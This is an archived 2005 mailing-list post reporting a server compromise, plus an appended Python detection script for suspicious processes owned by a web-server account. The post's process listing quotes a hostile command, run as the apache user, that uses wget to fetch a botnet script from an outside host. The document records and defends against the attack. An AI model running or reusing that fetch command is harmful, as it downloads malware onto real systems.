[vox-tech] lugod.org cracked?
Rod Roark
rod at sunsetsystems.com
Tue Feb 15 12:22:34 PST 2005
I found that something was sucking up all my bandwidth late
this morning. ps -aux showed this:
apache 3267 0.0 0.0 2560 1024 ? S 11:14 0:00 sh -c wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
apache 3268 0.0 0.1 3060 1460 ? S 11:14 0:00 wget leblocks.sytes.net/botnet
apache 3269 0.0 0.0 1416 448 ? S 11:14 0:00 grep abcdeee
After killing all processes owned by apache and doing a bit
of checking around, I found these Perl scripts in
/tmp/.images:
-rw-r--r-- 1 apache apache 20281 Feb 15 12:13 botnet
-rw-r--r-- 1 apache apache 9592 Oct 12 23:23 pv
-rw-r--r-- 1 apache apache 9592 Oct 12 23:23 pv.1
They are definitely malicious. Does anyone know what this
malware is?
-- Rod
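
The check described in the message above, as an added example that is not part of the original post: it parses `ps aux` output and flags every process owned by a web-server account whose executable is not the server itself. The account names, the expected-binary list and the two httpd rows in the sample are assumptions made for this example; the three flagged rows are the ones quoted in the post.

```python
import os

# Accounts the web server runs as (assumption; adjust for the host).
WEB_USERS = {"apache", "www-data"}
# Executables those accounts are expected to run (assumption: no CGI helpers).
EXPECTED = {"httpd", "apache2"}

def parse_ps_aux(text):
    """Yield (user, pid, command) for each process row of `ps aux` output."""
    for line in text.splitlines():
        # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        fields = line.split(None, 10)
        if len(fields) < 11 or not fields[1].isdigit():
            continue  # header row, blank line or truncated row
        yield fields[0], int(fields[1]), fields[10]

def flag_web_children(text):
    """Return (pid, executable, command) for web-account processes
    whose executable is not in EXPECTED."""
    hits = []
    for user, pid, cmd in parse_ps_aux(text):
        exe = os.path.basename(cmd.split()[0])
        if user in WEB_USERS and exe not in EXPECTED:
            hits.append((pid, exe, cmd))
    return hits

# Sample input: the two httpd rows are constructed; the rest is the
# listing quoted in the post.
SAMPLE = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 2101 0.0 0.4 9120 4208 ? S 09:02 0:00 /usr/sbin/httpd
apache 2110 0.0 0.5 9300 5100 ? S 09:02 0:01 /usr/sbin/httpd
apache 3267 0.0 0.0 2560 1024 ? S 11:14 0:00 sh -c wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
apache 3268 0.0 0.1 3060 1460 ? S 11:14 0:00 wget leblocks.sytes.net/botnet
apache 3269 0.0 0.0 1416 448 ? S 11:14 0:00 grep abcdeee
"""

if __name__ == "__main__":
    for pid, exe, cmd in flag_web_children(SAMPLE):
        print(f"pid {pid}: web account running {exe!r}: {cmd}")
```

On a live host, feed it the output of `ps aux` instead of `SAMPLE`; a site that legitimately runs CGI interpreters needs those added to `EXPECTED`.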